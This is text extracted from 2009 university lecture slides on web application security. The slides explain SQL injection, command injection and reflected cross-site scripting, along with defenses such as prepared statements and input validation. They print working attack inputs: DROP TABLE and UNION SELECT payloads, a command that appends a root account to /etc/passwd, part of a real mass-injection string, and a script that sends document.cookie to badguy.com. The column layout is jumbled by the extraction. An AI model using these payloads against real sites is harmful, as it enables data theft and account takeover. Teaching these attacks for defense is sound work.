CS 155 Spring 2009 Schematic web site architecture WS1 Firewall Firewall Application Load Secure Web Site Design Firewall WS App Balancer 2 DB (WAF) Servers WS3 John Mitchell IDS Authorization Netegrity (CA) Oblix (Oracle) 1 2 Web application code Common vulnerabilities Runs on web server or app server. SQL Injection Takes input from web users (via web server) Browser sends malicious input to server rd Interacts with the database and 3 parties. Sans Bad input checking leads to malicious SQL query Prepares results for users (via web server) Top XSS – Cross-site scripting 10 Examples: BdBad we b s ite sen ds innocent v itiictim a scri itthtpt that steals information from an honest web site Shopping carts, home banking, bill pay, tax prep, … CSRF – Cross-site request forgery New code written for every web site. Bad web site sends request to good web site, using Written in: credentials of an innocent victim who “visits” site C, PHP, Perl, Python, JSP, ASP, … Other problems Often written with little consideration for security HTTP response splitting, site redirects, … 3 4 Dynamic Web Application GET / HTTP/1.0 Browser Web SQL Injection server HTTP/1.1 200 OK index.php with slides from Neil Daswani Database server 5 6 1 PHP: Hypertext Preprocessor SQL Server scripting language with C-like syntax Widely used database query language Can intermingle static HTML and code Fetch a set of records <input value=<?php echo $myvalue; ?>> SELECT * FROM Person WHERE Username=‘grader’ Can embed variables in double-quote strings Add data to the table $user = “world”; echo “Hello $user!”; INSERT INTO Person (Username, Zoobars) or $user = “world”; echo “Hello” . $user . “!”; VALUES (‘grader’, 10) Form data in global arrays $_GET, $_POST, … Modify data UPDATE Person SET Zoobars=42 WHERE PersonID=5 Query syntax (mostly) independent of vendor 7 8 Example Basic picture: SQL Injection Sample PHP Victim Server $recipient = $_POST[‘recipient’]; $sql = "SELECT PersonID FROM Person WHERE 1 Username='$recipient'"; 2 $rs = $db->executQteQuery($sql); unintended Problem 3 receive valuable data query Attacker What if ‘recipient’ is malicious string that changed the meaning of the query? Victim SQL DB 9 10 CardSystems Attack April 2008 SQL Vulnerabilities CardSystems credit card payment processing company SQL injection attack in June 2005 put company out of business The Attack 263,000 credit card #s stolen from database credit card #s stored unencrypted 43 million credit card #s exposed 11 2 Main steps in this attack Part of the SQL attack string DECLARE @T varchar(255),@C varchar(255) Use Google to find sites using a particular ASP style DECLARE Table_Cursor CURSOR vulnerable to SQL injection FOR select a.name,b.name from sysobjects a,syscolumns b where Use SQL injection on these sites to modify the page to a.id=b.id and a.xtype='u' and include a link to a Chinese site nihaorr1.com (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) Don't visit this site yourself! OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C The site (nihaorr1.com) serves JavaScript that exploits WHILE(@@FETCH_STATUS=0) BEGIN vulnerabilities in IE, RealPlayer, QQ Instant Messenger exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+'‘ ''') Steps (1) and (2) are automated in a tool that can be configured to FETCH NEXT FROM Table_Cursor INTO @T,@C inject whatever you like into vulnerable sites END CLOSE Table_Cursor There is some evidence that hackers may get paid for each visit to DEALLOCATE Table_Cursor; nihaorr1.com DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST( %20AS%20NVARCHAR(4000));EXEC(@S);-- 13 14 SQL Injection Examples Type 1 Attack Example Enter Username & SELECT passwd Web FROM USERS Password Web Browser WHERE uname DB Server (Client) IS ‘$username’ Attacker will modify 15 Malicious input SQL Injection Examples Malicious Query Enter Username SELECT passwd & FROM USERS Web Password Web WHERE uname Browser DB Server IS ‘’;DROPTABLE; DROP TABLE (Client) USERS; -- ‘ Eliminates all user Attacker Modifies Input accounts 17 3 What is SQL Injection? SQL Injection Examples Input Validation Vulnerability View pizza order history:<br> Untrusted user input in SQL query sent to back-end <form method="post" action="..."> database without sanitizing the data Month <select> <option name="month" value="1">Jan</option> Specific case of more general command injection ... Inserting untrusted input into a query or command <option name="month" value="12">Dec</option> </select> Year Why is this Bad? <p> <input type=submit name=submit value=View> Data can be misinterpreted as a command </form> Can alter the intended effect of command or query Attacker can post form that is not generated by this page. 19 20 SQL Injection Examples SQL Injection Examples Normal SELECT pizza, toppings, quantity, order_day FROM orders SQL WHERE userid=4123 All User Data Query AND order_month=10 Compromised Type 2 For ordhder_month parametttklditter, attacker could input Attack WHERE condition 0 OR 1=1 is always true! Gives attacker access to other users’ Malicious … private data! Query WHERE userid=4123 AND order_month=0 OR 1=1 21 22 SQL Injection Examples SQL Injection Examples A more damaging breach of user privacy: For order_month parameter, attacker could input 0 AND 1=0 Credit Card Info UNION SELECT cardholder, number, exp_month, exp_year Compromised FROM creditcards Attacker is able to Combine the results of two queries Empty table from first query with the sensitive credit card info of all users from second query 23 24 4 More Attacks Second-Order SQL Injection • Create new users: Second-Order SQL Injection: attack where data ‘; INSERT INTO USERS (‘uname’,’passwd’, stored in database is later used to conduct SQL ‘salt’) VALUES (‘hacker’,’38a74f’, 3234); injection Example: this vulnerability could exist if string Password reset: • escapiiing is appli lidiittled inconsistently ‘; UPDATE USERS SET [email protected] WHERE [email protected] Solution: Treat ALL parameters as dangerous UPDATE USERS SET passwdpasswd='cracked'='cracked' WHERE uname='admin'uname='admin' --''-- attacker chooses username 'admin' -- Strings not escaped! 26 Preventing SQL Injection Escaping Quotes Input validation For valid string inputs like username o’connor, use Filter escape characters Apostrophes, semicolons, percent symbols, hyphens, Ex: escape(o’connor) = o’’connor underscores, … only works for string inputs Any character that has special meanings Check th e d at a t ype ( e.g., mak e sure it’ s an in teger ) Whitelisting Blacklisting chars doesn’t work forget to filter out some characters could prevent valid input (e.g. username O’Brien) Allow only well-defined set of safe values Set implicitly defined through regular expressions 28 Prepared Statements Prepared Statement:Example Metacharacters (e.g. ‘) in queries provide distinction between data & control PreparedStatement ps = db.prepareStatement("SELECT pizza, toppings, quantity, order_day " Most attacks: data interpreted as control / + "FROM orders WHERE userid=? AND order_month=?"); alters the semantics of a query/cmd ps.setInt(1, session.getCurrentUserId()); Bind Variables: ? placeholders guaranteed to be data ps.setInt(2, Integgper.parseInt(reqqguest.getParamenter("month"))) ; ResultSet res = ps.executeQuery(); (not control) Bind Variable: Prepared Statements allow creation of static queries Data Placeholder with bind variables → preserves the structure of • query parsed w/o parameters intended query • bind variables are typed e.g. int, string, etc…* 29 5 Parameterized SQL Mitigating Impacts Build SQL queries by properly escaping args: ′ → \′ Prevent Schema & Information Leaks Example: Parameterized SQL: (ASP.NET 1.1) Ensures SQL arguments are properly escaped. Limit Privileges (Defense-in-Depth) SqlCommand cmd = new SqlCommand( "SELECT * FROM UserTable WHERE EtSitiDttdiDtbEncrypt Sensitive Data stored in Database username = @User AND password = @Pwd", dbConnection); Harden DB Server and Host OS cmd.Parameters.Add("@User", Request[“user”] ); cmd.Parameters.Add("@Pwd", Request[“pwd”] ); Apply Input Validation cmd.ExecuteReader(); 31 32 Other command injection Example: PHP server-side code for sending email $email = $_POST[“email”] $subject = $_POST[“subject”] Cross Site Scripting (XSS) system(“mail $email –s $subject < /tmp/joinmynetwork”) Attac ker can pos t http://yourdomain.com/mail.pl? [email protected]& subject=foo < /usr/passwd; ls OR http://yourdomain.com/mail.pl? [email protected]&subject=foo; echo “evil::0:0:root:/:/bin/sh">>/etc/passwd; ls Basic scenario: reflected XSS attack The setup Attack Server User input is echoed into HTML response. 1 2 Example: search field 5 http://victim.com/search.php ? term = apple search.php responds with: Victim client <HTML> <TITLE> Search Results </TITLE> <BODY> Victim Server Results for <?php echo $_GET[term] ?> : . </BODY> </HTML> Is this exploitable? 36 6 Bad input Attack Server Consider link: (properly URL encoded) www.attacker.com http://victim.com/search.php ? term = http://victim.com/search.php ? <script> window.open( term = <script> ... </script> “http://badguy.com?cookie = ” + Victim client document. cookie )</) </script> What if user clicks on this link? Victim Server 1. Browser goes to victim.com/search.php www.victim.com 2. Victim.com returns <html> <HTML> Results for <script> … Results for </script> <script> window.open(http://attacker.com? 3. Browser executes script: ... document.cookie ...) Sends badguy.com cookie for victim.com </script>